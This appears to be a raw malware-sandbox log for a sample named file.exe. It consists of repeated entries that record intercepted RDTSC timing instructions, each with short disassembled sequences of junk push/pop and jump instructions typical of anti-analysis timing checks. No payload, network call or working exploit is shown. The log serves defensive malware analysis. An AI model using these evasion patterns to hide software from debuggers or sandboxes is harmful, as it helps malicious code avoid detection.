Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FBBD9 second address: 12FBBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FBBDF second address: 12FBBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnl 00007F849CDA41F6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FC4D0 second address: 12FC4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FC4D8 second address: 12FC4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FC4E1 second address: 12FC4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FC4E5 second address: 12FC501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F849CDA41F6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FC501 second address: 12FC51C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849C4F2D9Fh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FC51C second address: 12FC522 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FC522 second address: 12FC537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F849C4F2D9Ch 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FCABC second address: 12FCAD6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F849CDA4204h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FCAD6 second address: 12FCADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301A85 second address: 1301AB4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F849CDA41FCh 0x00000008 jnc 00007F849CDA41F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 jnl 00007F849CDA41F6h 0x00000018 pop edx 0x00000019 push eax 0x0000001a jmp 00007F849CDA4203h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305B41 second address: 1305B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305B47 second address: 1305B62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4207h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305B62 second address: 1305B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849C4F2D9Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305B72 second address: 1305B8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F849CDA4203h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305B8A second address: 1305B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F849C4F2D96h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305B9C second address: 1305BA7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1304CC7 second address: 1304CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1304CD0 second address: 1304CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1304CD4 second address: 1304CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1304CDA second address: 1304CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CDA4204h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305130 second address: 1305140 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F849C4F2DA2h 0x00000008 jne 00007F849C4F2D96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13053E2 second address: 13053FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CDA4206h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130556B second address: 1305570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130585C second address: 1305863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305863 second address: 1305875 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F849C4F2D98h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007F849C4F2DB1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130BDDF second address: 130BDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA41FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130BF14 second address: 130BF1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130BF1C second address: 130BF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130BF20 second address: 130BF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130C1F8 second address: 130C1FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130C1FC second address: 130C202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130C202 second address: 130C208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130C208 second address: 130C21F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F849C4F2D9Ch 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130CED6 second address: 130CEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130CEDA second address: 130CEE0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130D5BF second address: 130D5E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849CDA4209h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13148C8 second address: 13148CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13148CE second address: 13148D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13145EA second address: 13145EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13145EE second address: 1314606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F849CDA41F8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F849CDA41F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1314606 second address: 131460A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1320703 second address: 132070F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F849CDA41FEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323890 second address: 1323894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323894 second address: 13238B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4209h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13238B8 second address: 13238CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849C4F2DA1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13238CE second address: 13238D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132343C second address: 1323440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323440 second address: 132345D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4200h 0x00000007 jnc 00007F849CDA41F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1257A12 second address: 1257A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1257A16 second address: 1257A20 instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1334349 second address: 133434F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133434F second address: 133438A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F849CDA41F6h 0x00000008 js 00007F849CDA41F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jg 00007F849CDA41F6h 0x00000017 jns 00007F849CDA41F6h 0x0000001d jmp 00007F849CDA4207h 0x00000022 jno 00007F849CDA41F6h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125FE54 second address: 125FE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F849C4F2D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1337BB5 second address: 1337BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849CDA41FAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1337BC5 second address: 1337BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1337BCB second address: 1337BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1337BD1 second address: 1337BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F849C4F2D96h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1337BE4 second address: 1337C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F849CDA4203h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F849CDA4209h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D580 second address: 124D58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F849C4F2D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D58A second address: 124D598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F849CDA41FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133A160 second address: 133A19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849C4F2D9Bh 0x00000009 push eax 0x0000000a jmp 00007F849C4F2DA1h 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F849C4F2DA8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1340CAE second address: 1340CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133F40D second address: 133F418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F849C4F2D96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133F418 second address: 133F41D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133F93F second address: 133F945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA82 second address: 133FA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA8C second address: 133FA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jne 00007F849C4F2D96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA9B second address: 133FA9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FD5A second address: 133FD6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F849C4F2D9Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FD6C second address: 133FD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FCh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FECF second address: 133FED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1344365 second address: 134436D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134436D second address: 1344372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1344372 second address: 1344378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134C0D8 second address: 134C0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134C0DC second address: 134C0E6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134C0E6 second address: 134C0EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134D82C second address: 134D830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134D830 second address: 134D870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA6h 0x00000007 jmp 00007F849C4F2D9Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jmp 00007F849C4F2D9Dh 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134D870 second address: 134D894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F849CDA41F6h 0x0000000a jmp 00007F849CDA4209h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13567D5 second address: 13567E5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F849C4F2D96h 0x00000008 jl 00007F849C4F2D96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1365440 second address: 1365444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375E81 second address: 1375E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375E87 second address: 1375E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1374D85 second address: 1374D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375050 second address: 1375055 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375055 second address: 137505B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137505B second address: 1375071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jl 00007F849CDA41FAh 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375071 second address: 1375077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375077 second address: 137507B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13751DC second address: 13751F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F849C4F2D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F849C4F2D9Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375349 second address: 1375364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375364 second address: 1375382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebx 0x00000007 push esi 0x00000008 jmp 00007F849C4F2DA2h 0x0000000d pop esi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13758CF second address: 13758D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F849CDA41F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375A09 second address: 1375A0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375A0E second address: 1375A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F849CDA4200h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1375B8C second address: 1375BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13789D2 second address: 13789F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F849CDA4206h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13789F4 second address: 13789F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1378A86 second address: 1378A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1378A8A second address: 1378AB3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 js 00007F849C4F2DBBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F849C4F2DA9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1378AB3 second address: 1378AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137A08B second address: 137A099 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F849C4F2D96h 0x0000000e rdtsc
